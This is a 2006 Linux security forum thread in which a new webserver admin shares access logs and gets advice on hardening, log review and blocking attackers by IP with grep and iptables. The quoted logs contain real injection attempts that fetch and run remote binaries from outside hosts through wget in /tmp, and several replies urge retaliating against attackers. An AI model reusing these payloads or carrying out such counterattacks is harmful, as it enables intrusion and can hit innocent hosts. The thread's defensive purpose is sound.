LinuxQuestions.org
Visit Jeremy's Blog.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices


Reply
  Search this Thread
Old 06-10-2006, 11:17 PM   #1
drkstr
Senior Member
 
Registered: Feb 2006
Location: Seattle, WA: USA
Distribution: Slackware 11.0
Posts: 1,191

Rep: Reputation: 45
How do I go about reporting an attempt to compromise my host?


OK, so I am about 6 months into Linux and I decide it was time to put up a webserver. Just out of curiosity, I review my access_log today and find some pretty interesting stuff. I am by no means an expert on all of this, but it appears that someone (multiple people actually) among other things, attempted to use injection to navigate to my /tmp directory to exploit it's world-writable permissions to download and execute a script.

Code:
217.141.108.138 - - [04/Jun/2006:00:25:03 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%201q2w3.xhost.ro/m3du;chmod%20744%20m3du;./m3du%20217.127.64.53%208080;00;echo%20YYY;echo|  HTTP/1.1" 404 287
217.141.108.138 - - [04/Jun/2006:00:25:05 -0500] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%201q2w3.xhost.ro/m3du;chmod%20744%20m3du;./m3du%20217.127.64.53%208080;00;echo%20YYY;echo|  HTTP/1.1" 404 286
217.141.108.138 - - [04/Jun/2006:00:25:06 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%201q2w3.xhost.ro/m3du;chmod%20744%20m3du;./m3du%20217.127.64.53%208080;00;echo%20YYY;echo|  HTTP/1.1" 404 293
217.141.108.138 - - [04/Jun/2006:00:25:08 -0500] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%201q2w3.xhost.ro/m3du;chmod%20744%20m3du;./m3du%20217.127.64.53%208080;00;echo%20YYY;echo|  HTTP/1.1" 404 291
217.141.108.138 - - [04/Jun/2006:00:25:10 -0500] "POST /xmlrpc.php HTTP/1.1" 404 287
217.141.108.138 - - [04/Jun/2006:00:25:12 -0500] "POST /drupal/xmlrpc.php HTTP/1.1" 404 294
217.141.108.138 - - [04/Jun/2006:00:25:13 -0500] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 300
217.141.108.138 - - [04/Jun/2006:00:25:15 -0500] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 297

....
65.110.43.170 - - [07/Jun/2006:01:10:35 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 287
65.110.43.170 - - [07/Jun/2006:01:10:36 -0500] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 286
65.110.43.170 - - [07/Jun/2006:01:10:37 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 293
65.110.43.170 - - [07/Jun/2006:01:10:38 -0500] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 291
65.110.43.170 - - [07/Jun/2006:01:10:39 -0500] "GET /articles/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 302
65.110.43.170 - - [07/Jun/2006:01:10:40 -0500] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 404 297
65.110.43.170 - - [07/Jun/2006:01:10:42 -0500] "POST /xmlrpc.php HTTP/1.1" 404 287
65.110.43.170 - - [07/Jun/2006:01:10:44 -0500] "POST /blog/xmlrpc.php HTTP/1.1" 404 292
65.110.43.170 - - [07/Jun/2006:01:10:45 -0500] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 299
65.110.43.170 - - [07/Jun/2006:01:10:46 -0500] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 300
65.110.43.170 - - [07/Jun/2006:01:10:47 -0500] "POST /drupal/xmlrpc.php HTTP/1.1" 404 294
65.110.43.170 - - [07/Jun/2006:01:10:48 -0500] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 300
65.110.43.170 - - [07/Jun/2006:01:10:49 -0500] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 297
65.110.43.170 - - [07/Jun/2006:01:10:50 -0500] "POST /xmlrpc.php HTTP/1.1" 404 287
65.110.43.170 - - [07/Jun/2006:01:10:52 -0500] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 294
65.110.43.170 - - [07/Jun/2006:01:10:53 -0500] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 294
66.249.72.171 - - [07/Jun/2006:05:00:06 -0500] "GET /robots.txt HTTP/1.1" 404 287
IRC ports?
Code:
69.16.172.3 - - [01/Jun/2006:07:00:40 -0500] "CONNECT 69.16.172.2:6667 HTTP/1.0" 405 302
69.16.172.3 - - [01/Jun/2006:07:00:40 -0500] "POST http://69.16.172.2:6667/ HTTP/1.0" 405 299
I have no Idea what this is, but doesn't look to malicious.
Code:
213.203.248.196 - - [31/May/2006:17:42:17 -0500] "GET /a1b2c3d4e5f6g7h8i9/nonexistentfile.php HTTP/1.0" 404 303
213.203.248.196 - - [31/May/2006:17:42:17 -0500] "GET /adxmlrpc.php HTTP/1.0" 404 277
213.203.248.196 - - [31/May/2006:17:42:18 -0500] "GET /adserver/adxmlrpc.php HTTP/1.0" 404 286
213.203.248.196 - - [31/May/2006:17:42:18 -0500] "GET /phpAdsNew/adxmlrpc.php HTTP/1.0" 404 287
213.203.248.196 - - [31/May/2006:17:42:18 -0500] "GET /phpadsnew/adxmlrpc.php HTTP/1.0" 404 287
213.203.248.196 - - [31/May/2006:17:42:19 -0500] "GET /phpads/adxmlrpc.php HTTP/1.0" 404 284
213.203.248.196 - - [31/May/2006:17:42:19 -0500] "GET /Ads/adxmlrpc.php HTTP/1.0" 404 281
213.203.248.196 - - [31/May/2006:17:42:20 -0500] "GET /ads/adxmlrpc.php HTTP/1.0" 404 281
213.203.248.196 - - [31/May/2006:17:42:20 -0500] "GET /xmlrpc.php HTTP/1.0" 404 275
213.203.248.196 - - [31/May/2006:17:42:21 -0500] "GET /xmlrpc/xmlrpc.php HTTP/1.0" 404 282
213.203.248.196 - - [31/May/2006:17:42:21 -0500] "GET /xmlsrv/xmlrpc.php HTTP/1.0" 404 282
Are these hack attempts? Is there a way to tell if they were successful or not? I'm assuming all the 404's are a good thing, but then again, I am pretty new to this stuff. If these are hack attempts, I find it pretty amazing that so many people would be interested in my pidly little webserver with nothing important on it. Did I sleep with the wrong persons daughter or something?

If any one could help me make sense of these logs, and give some advice on what I need to do from here, I would greatly apprecieate it.

thanks for your time!
...drkstr

**edit**
oops, I forgot to ask my primary question.
Assuming this is an attempt to compromise my system. What kind of tools can I use to A) figure out who is doing it, and B) prevent them from doing it in the future.

thanks again!
**edit**

Last edited by drkstr; 06-11-2006 at 01:46 AM.
 
Old 06-11-2006, 10:36 AM   #2
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,415
Blog Entries: 55

Rep: Reputation: 3603Reputation: 3603Reputation: 3603Reputation: 3603Reputation: 3603Reputation: 3603Reputation: 3603Reputation: 3603Reputation: 3603Reputation: 3603Reputation: 3603
Just out of curiosity, I review my access_log today
Ahhh... better review logs regularly. Achieve max mana by hardening the box first, regular updating and backups and using auditing tools like a file integrity checker (Aide, Samhain, md5deep or even tripwire), your distro's package manager (if it has verification functionality), Tiger, Chkrootkit, Rootkit Hunter and reporting tools like Logwatch, swatch etc, etc.


it appears that someone (multiple people actually) among other things, attempted
Yes, it's always heartwarming to see that out of the gazillion boxen around they take interest in *yours*, innit? ;-p


Are these hack attempts?
H^HCracking attempts, yes.


Is there a way to tell if they were successful or not? I'm assuming all the 404's are a good thing
In general you would be looking for vulnerabilities in the webserver (or more likely applications running on top of it: PHP-based apps are notorious for being flawed), rogue processes that run with the UID of the webserver, binaries and scripts in accessable temp dirs (lsof), processes with "typical" string contents like wget (see mod_security), processes using files that are deleted (lsof), and to some lesser extent setuid root binaries in accessable temp dirs, rootkits. Yes, four-oh-fours are good.


Assuming this is an attempt to compromise my system. What kind of tools can I use to A) figure out who is doing it, and B) prevent them from doing it in the future.
Tools and methods mentioned above. Prevention means taking away chances. This is best done starting with a box in pristine state. Check out the LQ FAQ: Security references, post #1 under securing and hardening. Best to read, draw a plan and discuss it.
 
Old 06-11-2006, 12:40 PM   #3
drkstr
Senior Member
 
Registered: Feb 2006
Location: Seattle, WA: USA
Distribution: Slackware 11.0
Posts: 1,191

Original Poster
Rep: Reputation: 45
Wow, the "LQ FAQ: Security references" looks like a great resource! Thanks for takeing the time to compile all of that information. I see I have some reading to do, so I will post back if I can't figure something out.

Quote:
Ahhh... better review logs regularly.
Yes I can see now that this could be an important step.

THanks again for the information!
...drkstr
 
Old 06-12-2006, 09:43 PM   #4
operator10001
Member
 
Registered: Mar 2006
Distribution: debian sarge
Posts: 222

Rep: Reputation: 30
retaliate. hack the hackers. or ping the hell out of them. if its done right, their systems will totally crash.
operator
 
Old 06-12-2006, 09:46 PM   #5
operator10001
Member
 
Registered: Mar 2006
Distribution: debian sarge
Posts: 222

Rep: Reputation: 30
retaliate. hack the hackers. or ping the hell out of them. if its done right, their systems will totally crash.
operator
 
Old 06-12-2006, 10:29 PM   #6
gilead
Senior Member
 
Registered: Dec 2005
Location: Brisbane, Australia
Distribution: Slackware64 14.0
Posts: 4,141

Rep: Reputation: 168Reputation: 168
Quote:
Originally Posted by operator10001
retaliate. hack the hackers. or ping the hell out of them. if its done right, their systems will totally crash.
operator
And if they're just unwittingly hosting someobody else's bot, you've left yourself open to accusations of cracking for no good reason. Some of the ISPs here put no scanning, cracking, spamming type clauses in their usage policy so you could wind up cut off from the internet - that would definitely hurt me
 
Old 06-12-2006, 11:47 PM   #7
operator10001
Member
 
Registered: Mar 2006
Distribution: debian sarge
Posts: 222

Rep: Reputation: 30
oh ok. why didnt i think of that? those rules are very seldom enforced. the net is an anarchy.
 
Old 06-13-2006, 01:14 AM   #8
imagineers7
Member
 
Registered: Mar 2006
Distribution: BackTrack, RHEL, FC, CentOS, IPCop, Ubuntu, 64Studio, Elive, Dream Linux, Trix Box
Posts: 310

Rep: Reputation: 30
Best way,

Create an automated response for abuse@XXXX
which is to be picked from log files automatically.


(Enforce them to look into the matter by sending those many mails as that of log entries )
 
Old 06-13-2006, 01:19 AM   #9
drkstr
Senior Member
 
Registered: Feb 2006
Location: Seattle, WA: USA
Distribution: Slackware 11.0
Posts: 1,191

Original Poster
Rep: Reputation: 45
Thanks for the advice but I would rather spend my time figuring out how to secure my own box instead of figuring out how to crack some lamo script kiddie's box. Not that I am against your idea, in fact I think it would be sweet sweet justice, I just think I would benefit more from spending the time to learn good security techniques. Maybe when I am more knowledgable in this topic I can figure out away to set up countermeasures to route their own commands back to them. I would find it pretty historical if I got a script kiddie to try and hack his own box without realizing it.

regards,
...drkstr
 
Old 06-13-2006, 01:34 AM   #10
//////
Member
 
Registered: Nov 2005
Location: Land of Linux :: Finland
Distribution: Pop!_OS && Windows 10 && Arch Linux
Posts: 831

Rep: Reputation: 350Reputation: 350Reputation: 350Reputation: 350
you could patch your iptables/kernel with mirror target and use it temporarily when you are getting hits to a ssh port
 
Old 06-13-2006, 01:42 AM   #11
imagineers7
Member
 
Registered: Mar 2006
Distribution: BackTrack, RHEL, FC, CentOS, IPCop, Ubuntu, 64Studio, Elive, Dream Linux, Trix Box
Posts: 310

Rep: Reputation: 30
Hello everyone,


@//////,

It took a lot of time to measure "/"s,
Hey but whats that mirroring /|\ thing?
 
Old 06-13-2006, 01:45 AM   #12
imagineers7
Member
 
Registered: Mar 2006
Distribution: BackTrack, RHEL, FC, CentOS, IPCop, Ubuntu, 64Studio, Elive, Dream Linux, Trix Box
Posts: 310

Rep: Reputation: 30
Hi guys,

I had heard somewhere that we could imitate to be NT boxes over the Internet, anybody has an idea? Also, I had heard that there are some daemons which pretend to be cracked, crashed and collapsed and then notify us about everything that the cracker did. I had found some but had oldest possible versions that are of no use now (kernel 2.0.xx)
 
Old 06-13-2006, 03:00 AM   #13
//////
Member
 
Registered: Nov 2005
Location: Land of Linux :: Finland
Distribution: Pop!_OS && Windows 10 && Arch Linux
Posts: 831

Rep: Reputation: 350Reputation: 350Reputation: 350Reputation: 350
That mirror target switches source and destination fields in packets and resends them, so if someone tries to bruteforce port 22 and you use mirror target he will be cracking himself.
 
Old 06-13-2006, 03:04 AM   #14
drkstr
Senior Member
 
Registered: Feb 2006
Location: Seattle, WA: USA
Distribution: Slackware 11.0
Posts: 1,191

Original Poster
Rep: Reputation: 45
Quote:
Create an automated response for abuse@XXXX
which is to be picked from log files automatically.
Good idea.

I was hoping to try and set something up that would automatically detect intrusion attempts and log the IP in a &^#@* list. As a counter measure, I could then hopefully configure my iptables to check this list prior to any rule checking and route all traffic back to them if it finds a match in the list.

Does anyone know if it is possible to do this with iptables?

thanks for the help!
...drkstr
 
Old 06-13-2006, 03:32 AM   #15
imagineers7
Member
 
Registered: Mar 2006
Distribution: BackTrack, RHEL, FC, CentOS, IPCop, Ubuntu, 64Studio, Elive, Dream Linux, Trix Box
Posts: 310

Rep: Reputation: 30
Hello darkstar,

We obviously can do it with simplest of scripts.

I haven't created it yet but we can grep as follows:-

To check root user ssh fail
Quote:
grep "Failed password for root" /var/log/messages | gawk -F: '{print $4}' | gawk -F" " '{print $6}' | sort | uniq -c
To check illegal usernames such as "test"
Quote:
grep "Failed password for illegal" /var/log/messages | gawk -F: '{print $4}' | gawk -F" " '{print $8}' | sort | uniq -c
To check for ssh scan:-
Quote:
grep "Did not receive identification string from" /var/log/messages | gawk '{print $12}' | sort | uniq -c
the file may change /var/log/messages or /var/log/secure
other things remain the same.

And we get a good list (Superb candidates) redirect this to a list and then
iptables -I INPUT -s xx.x.x.x -j DROP

Risk involved is that what if you enter wrong passwords?
So better make it count the no. of tries.
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
access_log compromise ?? lawadm1 Linux - Security 8 12-18-2005 12:40 AM
phpBB Compromise chris_yumm Linux - Security 6 07-22-2005 01:54 AM
Security Compromise apache Linux - Security 16 08-07-2004 11:29 PM
Has anyone seen anything posted on the bell.ca RDNS compromise? chort Linux - Security 3 12-06-2003 08:45 AM
Segfaults in commands, possible compromise? afubini Linux - Security 2 10-15-2003 07:51 AM

LinuxQuestions.org > Forums > Linux Forums > Linux - Security

All times are GMT -5. The time now is 12:36 PM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Open Source Consulting | Domain Registration